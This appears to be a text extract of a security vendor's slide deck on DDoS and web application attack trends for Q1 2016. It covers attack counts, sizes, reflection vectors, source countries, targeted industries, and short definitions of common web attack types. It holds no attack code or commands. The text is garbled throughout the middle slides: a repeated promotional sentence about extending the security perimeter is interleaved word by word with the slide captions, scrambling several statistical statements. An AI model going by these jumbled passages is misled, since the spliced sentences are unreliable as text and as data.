DDoS attack patterns across the APJ cloud market Samuel Chen CCIE#9607 Enterprise Security Architect, Manager - APJ www.cloudsec.com/tw
DDoS attacks from Q1 2014 to Q1 2016 Each dot represents an individual DDoS attack, and each interval covers a 10-fold increase in attack size. The boxes mark the interquartile range the middle 50% of attacks.
DDoS Attack Median Packet Rate and IQR While there were six DDoS attacks in Q1 that exceeded 30 Mpps, more than half of the attacks measured 1 Mpps or less. The graph shows the packet rate for the middle 50% of DDoS attacks from Q1 2014 Q1 2016
Compared to Q1 2015 125% Total DDoS attacks 142% Infrastructure layer attacks 35% Average attack duration 138% Total attacks > 100 Gbps In Q1 2016, repeat DDoS attacks remained the norm, with an average of 29 attacks per targeted customer. One target suffered 283 attacks an average of three times per day for the quarter.
Compared to Q4 2015 23% Total DDoS attacks 107% Repeat attacks per target 23% Infrastructure layer attacks 8% Average attack duration 280% Total attacks >100 Gbps Largest attack: 289 Gbps Most packets per second: 67 Mpps In Q1 2016, stresser/booter-based botnets remained the source of the vast majority of DDoS attacks observed by Akamai. These tools rely heavily upon reflection techniques to fuel their traffic.
Types of DDoS Attacks & Relative Distribution in Q1 2016 UDP Fragment, DNS, NTP and CHARGEN attack vectors made up almost 70% of the attacks.
10 Most Frequent Attack Vectors by Quarter TCP Anomaly attacks remain in the top 10 vectors, which first edged out ICMP attacks in Q4 2015. Avoid data theft and downtime by extending the security perimeter outside the data-center and protect from increasing frequency, scale and sophistication of web attacks.
Multi-Vector DDoS Attacks Are the Norm Multi-vector Avoid data theft and downtime by extending attacks the accounted security perimeter outside the data-center and for 59% of DDoS protect from increasing frequency, scale and activity sophistication in Q1 2016, of web attacks. up from 56% in Q4 2015
Reflection-Based DDoS Attacks, Q1 2015-Q1 2016 Avoid data theft and downtime by extending the security perimeter outside the data-center and protect from increasing frequency, scale and sophistication of web attacks. SSDP, NTP, DNS, and CHARGEN have consistently been used as the most common reflection attack vectors, as shown on the left axis. The use of reflection attacks has increased dramatically since Q1 2015, as shown on the right axis.
DDoS Attack Frequency by Industry Avoid data theft and downtime by extending the security perimeter outside the data-center and protect from increasing frequency, scale and sophistication of web attacks.
Average Number of DDoS Attacks per Target In Q1 2016 there were an average of 29 DDoS Avoid data theft and downtime by extending the security perimeter outside attacks the data-center per target, and up protect from increasing frequency, scale and sophistication of web attacks. from 24 last quarter. One target was hit with 283 attacks averaging more than 3 attacks per day.
Top 10 Source Countries for DDoS Attacks in Q1 2016 China was the top source of non- Avoid data theft and downtime by extending the security perimeter outside the data-center spoofed DDoS and attacks protect from increasing frequency, in the scale first and quarter, sophistication of web attacks. followed by the US.
Top 5 Source Countries for DDoS Attacks, Q1 2015 Q1 2016 Avoid data theft and downtime by extending the security perimeter outside the data-center and protect from increasing frequency, scale and sophistication of web attacks. China has been the top source country for DDoS attacks since Q1 2015, with the exception of Q3 2015, when the UK took the top spot.
Mega Attacks > 100 Gbps in Q1 2016 Nineteen attacks exceeded 100 Gbps in Q1 2016, with the largest hitting the software and technology, gaming and media-entertainment Avoid data theft and downtime sectors. by extending the security perimeter outside the data-center and protect from increasing frequency, scale and sophistication of web attacks.
Mega Attacks > 30 Mpps in Q1 2016 Of the six attacks exceeding 30 Mpps in Avoid data theft and downtime by extending Q1 the 2016, the four security perimeter outside the data-center and largest targeted the protect from increasing frequency, scale and software sophistication and of web attacks. technology sector.
Spotlight: Attack traffic distribution Avoid data theft and downtime within by scrubbing extending center the locations, highlighted with security perimeter outside the data-center and Frankfurt absorbing the protect from increasing frequency, scale and sophistication of web attacks. highest peak bandwidth of 104 Gbps.
Web Application Attack Analysis
9 Common Web Attack Vectors SQLi / SQL injection: User content is passed to an SQL statement without proper validation LFI / Local file inclusion: Gains unauthorized read access to local files on the web server RFI / Remote file inclusion: Abuse of the dynamic file include mechanism available in many programming languages to load remote malicious code into the victim web application PHPi / PHP injection: Injects PHP code that gets executed by the PHP interpreter CMDi / Command injection: Executes arbitrary shell commands on the target system JAVAi / Java injection: Abuses the Object Graph Navigation Language (OGNL), a Java expression language. Popular due to recent flaws in the Java-based Struts Framework, which uses OGNL extensively MFU / Malicious file upload (or unrestricted file upload): Uploads unauthorized files to the target application that may be used later to gain full control over the system XSS / Cross-site scripting: Injects client-side code into web pages viewed by others whose browsers execute the code within the security context (or zone) of the hosting web site. Reads, modifies and/or transmits data accessible by the browser Shellshock / Disclosed in September 2014: A vulnerability in the Bash shell (the default shell for Linux and mac OS X) that allows for arbitrary command execution by a remote attacker
Web Application Attack Vectors Over HTTP, Q1 2016 SQLi, LFI and XSS were the most prevalent attack vectors. They were used in more than 90% of the attacks over HTTP.
Attacks Over HTTPS, Q1 2016 30% of the web application attacks observed in Q1 2016 were over encrypted (HTTPS) connections, an increase from only 11% the previous quarter.
Top 10 Source Countries for Web Application Attacks, Q1 2016
Top 10 Target Countries for Web Application Attacks, Q1 2016 US-hosted web sites were targeted six times more often than the second most popular target country, Brazil.
Web Application Attacks by Industry, Q1 2016 As in previous quarters, the retail industry was most frequently targeted with web application attacks in Q1 2016.
Web Application Attack Triggers by Industry, Q1 2016 94% of the attack triggers for web application attacks in Q1 2016 targeted just eight industries (shown in black).
SQLi and LFI Attack Triggers by Target Industry, Q1 2016
Shellshock, XSS, and MFU Attack Triggers by Industry
CMDI, PHPI, and RFI Attack Triggers by Industry
24 Hour Bot Traffic Snapshot
Akamai Intelligent Platform Firewall Activity
Reflector Activity The location of leveraged Internet devices used in reflection-based DDoS attacks during Q1 2016 was concentrated in the US, Asia, and Europe.
Top 10 Reflection Sources by ASN
DDoS Reflection Sources
Cloud Security Resources
Q1 2016 Cloud Security Resources Scraper and Bot Series When Good Bots Go Bad #OpKillingBay Expands Attacks BillGates Malware Used in DDoS Attacks Akamai Responds to Forwarding-Loop Issue IKE/IKEv2 Ripe for DDoS Abuse Akamai and the Glibc Vulnerability (CVE-2015-7547) Akamai and the DROWN Vulnerability DNSSEC Targeted in DNS Reflection, Amplification DDoS Attacks Akamai Customers Not Vulnerable to SLOTH How Web Applications Become SEO Pawns
Samuel Chen CCIE#9607 Enterprise Security Architect, Manager - APJ